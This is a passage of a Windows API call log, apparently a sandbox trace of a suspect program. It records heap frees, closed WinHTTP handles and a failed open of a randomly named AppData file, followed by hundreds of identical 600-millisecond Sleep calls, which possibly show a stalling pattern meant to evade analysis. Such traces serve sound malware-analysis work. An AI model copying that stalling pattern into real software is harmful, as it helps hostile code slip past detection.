[0240.223] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97e4080) returned 1 [0240.223] WinHttpCloseHandle (hInternet=0x3eeadd0) returned 1 [0240.223] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80680) returned 0x10d [0240.223] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80680) returned 1 [0240.224] WinHttpCloseHandle (hInternet=0x3faa0e0) returned 1 [0240.224] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a805b0) returned 0x68 [0240.224] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a805b0) returned 1 [0240.224] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80590) returned 0x12 [0240.224] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80590) returned 1 [0240.224] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0240.224] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80470) returned 0x10c [0240.224] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80470) returned 1 [0240.224] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802c0) returned 0xa4 [0240.225] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802c0) returned 1 [0240.225] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80370) returned 0xf3 [0240.225] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80370) returned 1 [0240.225] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.226] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a800a0) returned 0x210 [0240.227] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a800a0) returned 1 [0240.227] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d3360) returned 0x1008 [0240.227] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d3360) returned 1 [0240.227] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2350) returned 0x1008 [0240.228] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2350) returned 1 [0240.228] VirtualFree (lpAddress=0x2660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.229] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.230] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x26 [0240.230] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0240.231] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0240.231] Sleep (dwMilliseconds=0x258) [0240.236] Sleep (dwMilliseconds=0x258) [0240.251] Sleep (dwMilliseconds=0x258) [0240.279] Sleep (dwMilliseconds=0x258) [0240.283] Sleep (dwMilliseconds=0x258) [0240.299] Sleep (dwMilliseconds=0x258) [0240.314] Sleep (dwMilliseconds=0x258) [0240.330] Sleep (dwMilliseconds=0x258) [0240.345] Sleep (dwMilliseconds=0x258) [0240.369] Sleep (dwMilliseconds=0x258) [0240.376] Sleep (dwMilliseconds=0x258) [0240.392] Sleep (dwMilliseconds=0x258) [0240.408] Sleep (dwMilliseconds=0x258) [0240.424] Sleep (dwMilliseconds=0x258) [0240.439] Sleep (dwMilliseconds=0x258) [0240.454] Sleep (dwMilliseconds=0x258) [0240.470] Sleep (dwMilliseconds=0x258) [0240.486] Sleep (dwMilliseconds=0x258) [0240.503] Sleep (dwMilliseconds=0x258) [0240.517] Sleep (dwMilliseconds=0x258) [0240.533] Sleep (dwMilliseconds=0x258) [0240.548] Sleep (dwMilliseconds=0x258) [0240.565] Sleep (dwMilliseconds=0x258) [0240.580] Sleep (dwMilliseconds=0x258) [0240.595] Sleep (dwMilliseconds=0x258) [0240.610] Sleep (dwMilliseconds=0x258) [0240.626] Sleep (dwMilliseconds=0x258) [0240.642] Sleep (dwMilliseconds=0x258) [0240.726] Sleep (dwMilliseconds=0x258) [0240.769] Sleep (dwMilliseconds=0x258) [0240.814] Sleep (dwMilliseconds=0x258) [0240.902] Sleep (dwMilliseconds=0x258) [0240.965] Sleep (dwMilliseconds=0x258) [0240.978] Sleep (dwMilliseconds=0x258) [0241.004] Sleep (dwMilliseconds=0x258) [0241.048] Sleep (dwMilliseconds=0x258) [0241.135] Sleep (dwMilliseconds=0x258) [0241.206] Sleep (dwMilliseconds=0x258) [0241.251] Sleep (dwMilliseconds=0x258) [0241.302] Sleep (dwMilliseconds=0x258) [0241.378] Sleep (dwMilliseconds=0x258) [0241.446] Sleep (dwMilliseconds=0x258) [0241.484] Sleep (dwMilliseconds=0x258) [0241.531] Sleep (dwMilliseconds=0x258) [0241.619] Sleep (dwMilliseconds=0x258) [0241.681] Sleep (dwMilliseconds=0x258) [0241.719] Sleep (dwMilliseconds=0x258) [0241.766] Sleep (dwMilliseconds=0x258) [0241.870] Sleep (dwMilliseconds=0x258) [0241.921] Sleep (dwMilliseconds=0x258) [0241.968] Sleep (dwMilliseconds=0x258) [0242.015] Sleep (dwMilliseconds=0x258) [0242.097] Sleep (dwMilliseconds=0x258) [0242.167] Sleep (dwMilliseconds=0x258) [0242.206] Sleep (dwMilliseconds=0x258) [0242.249] Sleep (dwMilliseconds=0x258) [0242.332] Sleep (dwMilliseconds=0x258) [0242.396] Sleep (dwMilliseconds=0x258) [0242.452] Sleep (dwMilliseconds=0x258) [0242.499] Sleep (dwMilliseconds=0x258) [0242.563] Sleep (dwMilliseconds=0x258) [0242.600] Sleep (dwMilliseconds=0x258) [0242.647] Sleep (dwMilliseconds=0x258) [0242.703] Sleep (dwMilliseconds=0x258) [0242.784] Sleep (dwMilliseconds=0x258) [0242.875] Sleep (dwMilliseconds=0x258) [0242.974] Sleep (dwMilliseconds=0x258) [0243.018] Sleep (dwMilliseconds=0x258) [0243.058] Sleep (dwMilliseconds=0x258) [0243.093] Sleep (dwMilliseconds=0x258) [0243.166] Sleep (dwMilliseconds=0x258) [0243.310] Sleep (dwMilliseconds=0x258) [0243.367] Sleep (dwMilliseconds=0x258) [0243.413] Sleep (dwMilliseconds=0x258) [0243.489] Sleep (dwMilliseconds=0x258) [0243.550] Sleep (dwMilliseconds=0x258) [0243.594] Sleep (dwMilliseconds=0x258) [0243.629] Sleep (dwMilliseconds=0x258) [0243.664] Sleep (dwMilliseconds=0x258) [0243.736] Sleep (dwMilliseconds=0x258) [0243.792] Sleep (dwMilliseconds=0x258) [0243.827] Sleep (dwMilliseconds=0x258) [0243.865] Sleep (dwMilliseconds=0x258) [0243.933] Sleep (dwMilliseconds=0x258) [0244.040] Sleep (dwMilliseconds=0x258) [0244.100] Sleep (dwMilliseconds=0x258) [0244.139] Sleep (dwMilliseconds=0x258) [0244.174] Sleep (dwMilliseconds=0x258) [0244.245] Sleep (dwMilliseconds=0x258) [0244.298] Sleep (dwMilliseconds=0x258) [0244.350] Sleep (dwMilliseconds=0x258) [0244.401] Sleep (dwMilliseconds=0x258) [0244.505] Sleep (dwMilliseconds=0x258) [0244.590] Sleep (dwMilliseconds=0x258) [0244.629] Sleep (dwMilliseconds=0x258) [0244.681] Sleep (dwMilliseconds=0x258) [0244.718] Sleep (dwMilliseconds=0x258) [0244.794] Sleep (dwMilliseconds=0x258) [0244.854] Sleep (dwMilliseconds=0x258) [0244.892] Sleep (dwMilliseconds=0x258) [0244.929] Sleep (dwMilliseconds=0x258) [0245.001] Sleep (dwMilliseconds=0x258) [0245.059] Sleep (dwMilliseconds=0x258) [0245.101] Sleep (dwMilliseconds=0x258) [0245.140] Sleep (dwMilliseconds=0x258) [0245.305] Sleep (dwMilliseconds=0x258) [0245.363] Sleep (dwMilliseconds=0x258) [0245.402] Sleep (dwMilliseconds=0x258) [0245.450] Sleep (dwMilliseconds=0x258) [0245.532] Sleep (dwMilliseconds=0x258) [0245.599] Sleep (dwMilliseconds=0x258) [0245.645] Sleep (dwMilliseconds=0x258) [0245.679] Sleep (dwMilliseconds=0x258) [0245.723] Sleep (dwMilliseconds=0x258) [0245.789] Sleep (dwMilliseconds=0x258) [0245.824] Sleep (dwMilliseconds=0x258) [0245.898] Sleep (dwMilliseconds=0x258) [0246.039] Sleep (dwMilliseconds=0x258) [0246.303] Sleep (dwMilliseconds=0x258) [0246.336] Sleep (dwMilliseconds=0x258) [0246.550] Sleep (dwMilliseconds=0x258) [0246.647] Sleep (dwMilliseconds=0x258) [0246.718] Sleep (dwMilliseconds=0x258) [0246.805] Sleep (dwMilliseconds=0x258) [0246.885] Sleep (dwMilliseconds=0x258) [0246.929] Sleep (dwMilliseconds=0x258) [0247.022] Sleep (dwMilliseconds=0x258) [0247.082] Sleep (dwMilliseconds=0x258) [0247.118] Sleep (dwMilliseconds=0x258) [0247.178] Sleep (dwMilliseconds=0x258) [0247.272] Sleep (dwMilliseconds=0x258) [0247.318] Sleep (dwMilliseconds=0x258) [0247.366] Sleep (dwMilliseconds=0x258) [0247.444] Sleep (dwMilliseconds=0x258) [0247.515] Sleep (dwMilliseconds=0x258) [0247.577] Sleep (dwMilliseconds=0x258) [0247.615] Sleep (dwMilliseconds=0x258) [0247.708] Sleep (dwMilliseconds=0x258) [0247.771] Sleep (dwMilliseconds=0x258) [0247.818] Sleep (dwMilliseconds=0x258) [0247.912] Sleep (dwMilliseconds=0x258) [0247.978] Sleep (dwMilliseconds=0x258) [0248.021] Sleep (dwMilliseconds=0x258) [0248.054] Sleep (dwMilliseconds=0x258) [0248.098] Sleep (dwMilliseconds=0x258) [0248.192] Sleep (dwMilliseconds=0x258) [0248.259] Sleep (dwMilliseconds=0x258) [0248.301] Sleep (dwMilliseconds=0x258) [0248.395] Sleep (dwMilliseconds=0x258) [0248.459] Sleep (dwMilliseconds=0x258) [0248.502] Sleep (dwMilliseconds=0x258) [0248.535] Sleep (dwMilliseconds=0x258) [0248.582] Sleep (dwMilliseconds=0x258) [0248.676] Sleep (dwMilliseconds=0x258) [0248.722] Sleep (dwMilliseconds=0x258) [0248.769] Sleep (dwMilliseconds=0x258) [0248.863] Sleep (dwMilliseconds=0x258) [0248.912] Sleep (dwMilliseconds=0x258) [0248.956] Sleep (dwMilliseconds=0x258) [0249.003] Sleep (dwMilliseconds=0x258) [0249.097] Sleep (dwMilliseconds=0x258) [0249.158] Sleep (dwMilliseconds=0x258) [0249.190] Sleep (dwMilliseconds=0x258) [0249.237] Sleep (dwMilliseconds=0x258) [0249.332] Sleep (dwMilliseconds=0x258) [0249.389] Sleep (dwMilliseconds=0x258) [0249.424] Sleep (dwMilliseconds=0x258) [0249.471] Sleep (dwMilliseconds=0x258) [0249.565] Sleep (dwMilliseconds=0x258) [0249.620] Sleep (dwMilliseconds=0x258) [0249.665] Sleep (dwMilliseconds=0x258) [0249.827] Sleep (dwMilliseconds=0x258) [0249.861] Sleep (dwMilliseconds=0x258) [0249.955] Sleep (dwMilliseconds=0x258) [0250.002] Sleep (dwMilliseconds=0x258) [0250.049] Sleep (dwMilliseconds=0x258) [0250.142] Sleep (dwMilliseconds=0x258) [0250.195] Sleep (dwMilliseconds=0x258) [0250.236] Sleep (dwMilliseconds=0x258) [0250.283] Sleep (dwMilliseconds=0x258) [0250.362] Sleep (dwMilliseconds=0x258) [0250.427] Sleep (dwMilliseconds=0x258) [0250.589] Sleep (dwMilliseconds=0x258) [0250.692] Sleep (dwMilliseconds=0x258) [0250.765] Sleep (dwMilliseconds=0x258) [0250.813] Sleep (dwMilliseconds=0x258) [0250.851] Sleep (dwMilliseconds=0x258) [0250.938] Sleep (dwMilliseconds=0x258) [0251.000] Sleep (dwMilliseconds=0x258) [0251.047] Sleep (dwMilliseconds=0x258) [0251.093] Sleep (dwMilliseconds=0x258) [0251.188] Sleep (dwMilliseconds=0x258) [0251.242] Sleep (dwMilliseconds=0x258) [0251.281] Sleep (dwMilliseconds=0x258) [0251.327] Sleep (dwMilliseconds=0x258) [0251.406] Sleep (dwMilliseconds=0x258) [0251.496] Sleep (dwMilliseconds=0x258) [0251.530] Sleep (dwMilliseconds=0x258) [0251.577] Sleep (dwMilliseconds=0x258) [0251.658] Sleep (dwMilliseconds=0x258) [0251.726] Sleep (dwMilliseconds=0x258) [0251.765] Sleep (dwMilliseconds=0x258) [0251.809] Sleep (dwMilliseconds=0x258) [0251.842] Sleep (dwMilliseconds=0x258) [0251.936] Sleep (dwMilliseconds=0x258) [0251.967] Sleep (dwMilliseconds=0x258) [0251.974] Sleep (dwMilliseconds=0x258) [0251.994] Sleep (dwMilliseconds=0x258) [0251.999] Sleep (dwMilliseconds=0x258) [0252.021] Sleep (dwMilliseconds=0x258) [0252.030] Sleep (dwMilliseconds=0x258) [0252.063] Sleep (dwMilliseconds=0x258) [0252.158] Sleep (dwMilliseconds=0x258) [0252.180] Sleep (dwMilliseconds=0x258) [0252.185] Sleep (dwMilliseconds=0x258) [0252.205] Sleep (dwMilliseconds=0x258) [0252.217] Sleep (dwMilliseconds=0x258) [0252.235] Sleep (dwMilliseconds=0x258) [0252.248] Sleep (dwMilliseconds=0x258) [0252.264] Sleep (dwMilliseconds=0x258) [0252.312] Sleep (dwMilliseconds=0x258) [0252.345] Sleep (dwMilliseconds=0x258) [0252.359] Sleep (dwMilliseconds=0x258) [0252.384] Sleep (dwMilliseconds=0x258) [0252.397] Sleep (dwMilliseconds=0x258) [0252.407] Sleep (dwMilliseconds=0x258) [0252.424] Sleep (dwMilliseconds=0x258) [0252.435] Sleep (dwMilliseconds=0x258) [0252.520] Sleep (dwMilliseconds=0x258) [0252.543] Sleep (dwMilliseconds=0x258) [0252.545] Sleep (dwMilliseconds=0x258) [0252.578] Sleep (dwMilliseconds=0x258) [0252.592] Sleep (dwMilliseconds=0x258) [0252.607] Sleep (dwMilliseconds=0x258) [0252.623] Sleep (dwMilliseconds=0x258) [0252.674] Sleep (dwMilliseconds=0x258) [0252.721] Sleep (dwMilliseconds=0x258) [0252.732] Sleep (dwMilliseconds=0x258) [0252.748] Sleep (dwMilliseconds=0x258) [0252.763] Sleep (dwMilliseconds=0x258) [0252.779] Sleep (dwMilliseconds=0x258) [0252.794] Sleep (dwMilliseconds=0x258) [0252.843] Sleep (dwMilliseconds=0x258) [0252.877] Sleep (dwMilliseconds=0x258) [0252.888] Sleep (dwMilliseconds=0x258) [0252.903] Sleep (dwMilliseconds=0x258) [0252.920] Sleep (dwMilliseconds=0x258) [0252.937] Sleep (dwMilliseconds=0x258) [0252.950] Sleep (dwMilliseconds=0x258) [0252.966] Sleep (dwMilliseconds=0x258) [0253.018] Sleep (dwMilliseconds=0x258) [0253.054] Sleep (dwMilliseconds=0x258) [0253.060] Sleep (dwMilliseconds=0x258) [0253.075] Sleep (dwMilliseconds=0x258) [0253.091] Sleep (dwMilliseconds=0x258) [0253.106] Sleep (dwMilliseconds=0x258) [0253.122] Sleep (dwMilliseconds=0x258) [0253.137] Sleep (dwMilliseconds=0x258) [0253.188] Sleep (dwMilliseconds=0x258) [0253.207] Sleep (dwMilliseconds=0x258) [0253.215] Sleep (dwMilliseconds=0x258) [0253.231] Sleep (dwMilliseconds=0x258) [0253.246] Sleep (dwMilliseconds=0x258) [0253.262] Sleep (dwMilliseconds=0x258) [0253.277] Sleep (dwMilliseconds=0x258) [0253.293] Sleep (dwMilliseconds=0x258) [0253.346] Sleep (dwMilliseconds=0x258) [0253.364] Sleep (dwMilliseconds=0x258) [0253.371] Sleep (dwMilliseconds=0x258) [0253.387] Sleep (dwMilliseconds=0x258) [0253.402] Sleep (dwMilliseconds=0x258) [0253.419] Sleep (dwMilliseconds=0x258) [0253.433] Sleep (dwMilliseconds=0x258) [0253.449] Sleep (dwMilliseconds=0x258) [0253.508] Sleep (dwMilliseconds=0x258) [0253.532] Sleep (dwMilliseconds=0x258) [0253.543] Sleep (dwMilliseconds=0x258) [0253.558] Sleep (dwMilliseconds=0x258) [0253.574] Sleep (dwMilliseconds=0x258) [0253.589] Sleep (dwMilliseconds=0x258) [0253.605] Sleep (dwMilliseconds=0x258) [0253.623] Sleep (dwMilliseconds=0x258) [0253.674] Sleep (dwMilliseconds=0x258) [0253.691] Sleep (dwMilliseconds=0x258) [0253.698] Sleep (dwMilliseconds=0x258) [0253.714] Sleep (dwMilliseconds=0x258) [0253.731] Sleep (dwMilliseconds=0x258) [0253.745] Sleep (dwMilliseconds=0x258) [0253.761] Sleep (dwMilliseconds=0x258) [0253.777] Sleep (dwMilliseconds=0x258) [0253.831] Sleep (dwMilliseconds=0x258) [0253.847] Sleep (dwMilliseconds=0x258) [0253.855] Sleep (dwMilliseconds=0x258) [0253.871] Sleep (dwMilliseconds=0x258) [0253.886] Sleep (dwMilliseconds=0x258) [0253.901] Sleep (dwMilliseconds=0x258) [0253.917] Sleep (dwMilliseconds=0x258) [0253.933] Sleep (dwMilliseconds=0x258) [0253.980] Sleep (dwMilliseconds=0x258) [0254.003] Sleep (dwMilliseconds=0x258) [0254.010] Sleep (dwMilliseconds=0x258) [0254.026] Sleep (dwMilliseconds=0x258) [0254.043] Sleep (dwMilliseconds=0x258) [0254.057] Sleep (dwMilliseconds=0x258) [0254.073] Sleep (dwMilliseconds=0x258) [0254.089] Sleep (dwMilliseconds=0x258) [0254.140] Sleep (dwMilliseconds=0x258) [0254.164] Sleep (dwMilliseconds=0x258) [0254.167] Sleep (dwMilliseconds=0x258) [0254.182] Sleep (dwMilliseconds=0x258) [0254.198] Sleep (dwMilliseconds=0x258) [0254.213] Sleep (dwMilliseconds=0x258) [0254.229] Sleep (dwMilliseconds=0x258) [0254.245] Sleep (dwMilliseconds=0x258) [0254.295] Sleep (dwMilliseconds=0x258) [0254.314] Sleep (dwMilliseconds=0x258) [0254.323] Sleep (dwMilliseconds=0x258) [0254.338] Sleep (dwMilliseconds=0x258) [0254.354] Sleep (dwMilliseconds=0x258) [0254.370] Sleep (dwMilliseconds=0x258) [0254.385] Sleep (dwMilliseconds=0x258) [0254.401] Sleep (dwMilliseconds=0x258) [0254.450] Sleep (dwMilliseconds=0x258) [0254.481] Sleep (dwMilliseconds=0x258) [0254.494] Sleep (dwMilliseconds=0x258) [0254.510] Sleep (dwMilliseconds=0x258) [0254.525] Sleep (dwMilliseconds=0x258) [0254.541] Sleep (dwMilliseconds=0x258) [0254.557] Sleep (dwMilliseconds=0x258) [0254.572] Sleep (dwMilliseconds=0x258) [0254.623] Sleep (dwMilliseconds=0x258) [0254.643] Sleep (dwMilliseconds=0x258) [0254.650] Sleep (dwMilliseconds=0x258) [0254.666] Sleep (dwMilliseconds=0x258) [0254.681] Sleep (dwMilliseconds=0x258) [0254.698] Sleep (dwMilliseconds=0x258) [0254.713] Sleep (dwMilliseconds=0x258) [0254.728] Sleep (dwMilliseconds=0x258) [0254.785] Sleep (dwMilliseconds=0x258) [0254.805] Sleep (dwMilliseconds=0x258) [0254.806] Sleep (dwMilliseconds=0x258) [0254.822] Sleep (dwMilliseconds=0x258) [0254.837] Sleep (dwMilliseconds=0x258) [0254.853] Sleep (dwMilliseconds=0x258) [0254.870] Sleep (dwMilliseconds=0x258) [0254.884] Sleep (dwMilliseconds=0x258) [0254.936] Sleep (dwMilliseconds=0x258) [0254.953] Sleep (dwMilliseconds=0x258) [0254.962] Sleep (dwMilliseconds=0x258) [0254.978] Sleep (dwMilliseconds=0x258) [0254.993] Sleep (dwMilliseconds=0x258) [0255.010] Sleep (dwMilliseconds=0x258) [0255.024] Sleep (dwMilliseconds=0x258) [0255.040] Sleep (dwMilliseconds=0x258) [0255.092] Sleep (dwMilliseconds=0x258) [0255.110] Sleep (dwMilliseconds=0x258) [0255.118] Sleep (dwMilliseconds=0x258) [0255.134] Sleep (dwMilliseconds=0x258) [0255.149] Sleep (dwMilliseconds=0x258) [0255.165] Sleep (dwMilliseconds=0x258) [0255.181] Sleep (dwMilliseconds=0x258) [0255.196] Sleep (dwMilliseconds=0x258) [0255.249] Sleep (dwMilliseconds=0x258) [0255.266] Sleep (dwMilliseconds=0x258) [0255.274] Sleep (dwMilliseconds=0x258) [0255.290] Sleep (dwMilliseconds=0x258) [0255.305] Sleep (dwMilliseconds=0x258) [0255.322] Sleep (dwMilliseconds=0x258) [0255.337] Sleep (dwMilliseconds=0x258) [0255.352] Sleep (dwMilliseconds=0x258) [0255.408] Sleep (dwMilliseconds=0x258) [0255.424] Sleep (dwMilliseconds=0x258) [0255.430] Sleep (dwMilliseconds=0x258) [0255.446] Sleep (dwMilliseconds=0x258) [0255.471] Sleep (dwMilliseconds=0x258) [0255.480] Sleep (dwMilliseconds=0x258) [0255.493] Sleep (dwMilliseconds=0x258) [0255.508] Sleep (dwMilliseconds=0x258) [0255.556] Sleep (dwMilliseconds=0x258) [0255.577] Sleep (dwMilliseconds=0x258) [0255.586] Sleep (dwMilliseconds=0x258) [0255.602] Sleep (dwMilliseconds=0x258) [0255.618] Sleep (dwMilliseconds=0x258) [0255.634] Sleep (dwMilliseconds=0x258) [0255.649] Sleep (dwMilliseconds=0x258) [0255.664] Sleep (dwMilliseconds=0x258) [0255.713] Sleep (dwMilliseconds=0x258) [0255.740] Sleep (dwMilliseconds=0x258) [0255.742] Sleep (dwMilliseconds=0x258) [0255.758] Sleep (dwMilliseconds=0x258) [0255.773] Sleep (dwMilliseconds=0x258) [0255.796] Sleep (dwMilliseconds=0x258) [0255.805] Sleep (dwMilliseconds=0x258) [0255.820] Sleep (dwMilliseconds=0x258) [0255.876] Sleep (dwMilliseconds=0x258) [0255.909] Sleep (dwMilliseconds=0x258) [0255.914] Sleep (dwMilliseconds=0x258) [0255.929] Sleep (dwMilliseconds=0x258) [0255.946] Sleep (dwMilliseconds=0x258) [0255.961] Sleep (dwMilliseconds=0x258) [0255.977] Sleep (dwMilliseconds=0x258) [0255.992] Sleep (dwMilliseconds=0x258) [0256.046] Sleep (dwMilliseconds=0x258) [0256.069] Sleep (dwMilliseconds=0x258) [0256.070] Sleep (dwMilliseconds=0x258) [0256.086] Sleep (dwMilliseconds=0x258) [0256.101] Sleep (dwMilliseconds=0x258) [0256.117] Sleep (dwMilliseconds=0x258) [0256.132] Sleep (dwMilliseconds=0x258) [0256.149] Sleep (dwMilliseconds=0x258) [0256.200] Sleep (dwMilliseconds=0x258) [0256.222] Sleep (dwMilliseconds=0x258) [0256.226] Sleep (dwMilliseconds=0x258) [0256.241] Sleep (dwMilliseconds=0x258) [0256.259] Sleep (dwMilliseconds=0x258) [0256.273] Sleep (dwMilliseconds=0x258) [0256.288] Sleep (dwMilliseconds=0x258) [0256.304] Sleep (dwMilliseconds=0x258) [0256.355] Sleep (dwMilliseconds=0x258) [0256.386] Sleep (dwMilliseconds=0x258) [0256.397] Sleep (dwMilliseconds=0x258) [0256.413] Sleep (dwMilliseconds=0x258) [0256.429] Sleep (dwMilliseconds=0x258) [0256.444] Sleep (dwMilliseconds=0x258) [0256.460] Sleep (dwMilliseconds=0x258) [0256.486] Sleep (dwMilliseconds=0x258) [0256.530] Sleep (dwMilliseconds=0x258) [0256.562] Sleep (dwMilliseconds=0x258) [0256.569] Sleep (dwMilliseconds=0x258) [0256.586] Sleep (dwMilliseconds=0x258) [0256.600] Sleep (dwMilliseconds=0x258) [0256.616] Sleep (dwMilliseconds=0x258) [0256.632] Sleep (dwMilliseconds=0x258) [0256.647] Sleep (dwMilliseconds=0x258) [0256.699] Sleep (dwMilliseconds=0x258) [0256.716] Sleep (dwMilliseconds=0x258) [0256.725] Sleep (dwMilliseconds=0x258) [0256.741] Sleep (dwMilliseconds=0x258) [0256.756] Sleep (dwMilliseconds=0x258) [0256.775] Sleep (dwMilliseconds=0x258) [0256.787] Sleep (dwMilliseconds=0x258) [0256.804] Sleep (dwMilliseconds=0x258) [0256.861] Sleep (dwMilliseconds=0x258) [0256.884] Sleep (dwMilliseconds=0x258) [0256.897] Sleep (dwMilliseconds=0x258) [0256.913] Sleep (dwMilliseconds=0x258) [0256.928] Sleep (dwMilliseconds=0x258) [0256.943] Sleep (dwMilliseconds=0x258) [0256.959] Sleep (dwMilliseconds=0x258) [0256.975] Sleep (dwMilliseconds=0x258) [0257.024] Sleep (dwMilliseconds=0x258) [0257.048] Sleep (dwMilliseconds=0x258) [0257.053] Sleep (dwMilliseconds=0x258) [0257.068] Sleep (dwMilliseconds=0x258) [0257.084] Sleep (dwMilliseconds=0x258) [0257.099] Sleep (dwMilliseconds=0x258) [0257.116] Sleep (dwMilliseconds=0x258) [0257.141] Sleep (dwMilliseconds=0x258) [0257.259] Sleep (dwMilliseconds=0x258) [0257.323] Sleep (dwMilliseconds=0x258) [0257.365] Sleep (dwMilliseconds=0x258) [0257.412] Sleep (dwMilliseconds=0x258) [0257.513] Sleep (dwMilliseconds=0x258) [0257.582] Sleep (dwMilliseconds=0x258) [0257.614] Sleep (dwMilliseconds=0x258) [0257.662] Sleep (dwMilliseconds=0x258) [0257.744] Sleep (dwMilliseconds=0x258) [0257.811] Sleep (dwMilliseconds=0x258) [0257.873] Sleep (dwMilliseconds=0x258) [0257.912] Sleep (dwMilliseconds=0x258) [0257.990] Sleep (dwMilliseconds=0x258) [0258.063] Sleep (dwMilliseconds=0x258) [0258.098] Sleep (dwMilliseconds=0x258) [0258.184] Sleep (dwMilliseconds=0x258) [0258.248] Sleep (dwMilliseconds=0x258) [0258.285] Sleep (dwMilliseconds=0x258) [0258.286] Sleep (dwMilliseconds=0x258) [0258.326] Sleep (dwMilliseconds=0x258) [0258.441] Sleep (dwMilliseconds=0x258) [0258.490] Sleep (dwMilliseconds=0x258) [0258.535] Sleep (dwMilliseconds=0x258) [0258.644] Sleep (dwMilliseconds=0x258) [0258.706] Sleep (dwMilliseconds=0x258) [0258.753] Sleep (dwMilliseconds=0x258) [0258.794] Sleep (dwMilliseconds=0x258) [0258.878] Sleep (dwMilliseconds=0x258) [0258.977] Sleep (dwMilliseconds=0x258) [0259.007] Sleep (dwMilliseconds=0x258) [0259.039] Sleep (dwMilliseconds=0x258) [0259.113] Sleep (dwMilliseconds=0x258) [0259.198] Sleep (dwMilliseconds=0x258) [0259.238] Sleep (dwMilliseconds=0x258) [0259.259] Sleep (dwMilliseconds=0x258) [0259.275] Sleep (dwMilliseconds=0x258) [0259.302] Sleep (dwMilliseconds=0x258) [0259.356] Sleep (dwMilliseconds=0x258) [0259.426] Sleep (dwMilliseconds=0x258) [0259.440] Sleep (dwMilliseconds=0x258) [0259.458] Sleep (dwMilliseconds=0x258) [0259.480] Sleep (dwMilliseconds=0x258) [0259.486] Sleep (dwMilliseconds=0x258) [0259.534] Sleep (dwMilliseconds=0x258) [0259.559] Sleep (dwMilliseconds=0x258) [0259.564] Sleep (dwMilliseconds=0x258) [0259.608] Sleep (dwMilliseconds=0x258) [0259.611] Sleep (dwMilliseconds=0x258) [0259.627] Sleep (dwMilliseconds=0x258) [0259.643] Sleep (dwMilliseconds=0x258) [0259.705] Sleep (dwMilliseconds=0x258) [0259.720] Sleep (dwMilliseconds=0x258) [0259.736] Sleep (dwMilliseconds=0x258) [0259.752] Sleep (dwMilliseconds=0x258) [0259.767] Sleep (dwMilliseconds=0x258) [0259.783] Sleep (dwMilliseconds=0x258) [0259.798] Sleep (dwMilliseconds=0x258) [0259.861] Sleep (dwMilliseconds=0x258) [0259.876] Sleep (dwMilliseconds=0x258) [0259.914] Sleep (dwMilliseconds=0x258) [0259.923] Sleep (dwMilliseconds=0x258) [0259.939] Sleep (dwMilliseconds=0x258) [0259.954] Sleep (dwMilliseconds=0x258) [0260.017] Sleep (dwMilliseconds=0x258) [0260.040] Sleep (dwMilliseconds=0x258) [0260.048] Sleep (dwMilliseconds=0x258) [0260.063] Sleep (dwMilliseconds=0x258) [0260.080] Sleep (dwMilliseconds=0x258) [0260.095] Sleep (dwMilliseconds=0x258) [0260.110] Sleep (dwMilliseconds=0x258) [0260.126] Sleep (dwMilliseconds=0x258) [0260.189] Sleep (dwMilliseconds=0x258) [0260.206] Sleep (dwMilliseconds=0x258) [0260.220] Sleep (dwMilliseconds=0x258) [0260.235] Sleep (dwMilliseconds=0x258) [0260.251] Sleep (dwMilliseconds=0x258) [0260.267] Sleep (dwMilliseconds=0x258) [0260.282] Sleep (dwMilliseconds=0x258) [0260.298] Sleep (dwMilliseconds=0x258) [0260.360] Sleep (dwMilliseconds=0x258) [0260.375] Sleep (dwMilliseconds=0x258) [0260.392] Sleep (dwMilliseconds=0x258) [0260.407] Sleep (dwMilliseconds=0x258) [0260.422] Sleep (dwMilliseconds=0x258) [0260.438] Sleep (dwMilliseconds=0x258) [0260.453] Sleep (dwMilliseconds=0x258) [0260.575] Sleep (dwMilliseconds=0x258) [0260.615] Sleep (dwMilliseconds=0x258) [0260.625] Sleep (dwMilliseconds=0x258) [0260.641] Sleep (dwMilliseconds=0x258) [0260.656] Sleep (dwMilliseconds=0x258) [0260.672] Sleep (dwMilliseconds=0x258) [0260.687] Sleep (dwMilliseconds=0x258) [0260.703] Sleep (dwMilliseconds=0x258) [0260.766] Sleep (dwMilliseconds=0x258) [0260.789] Sleep (dwMilliseconds=0x258) [0260.797] Sleep 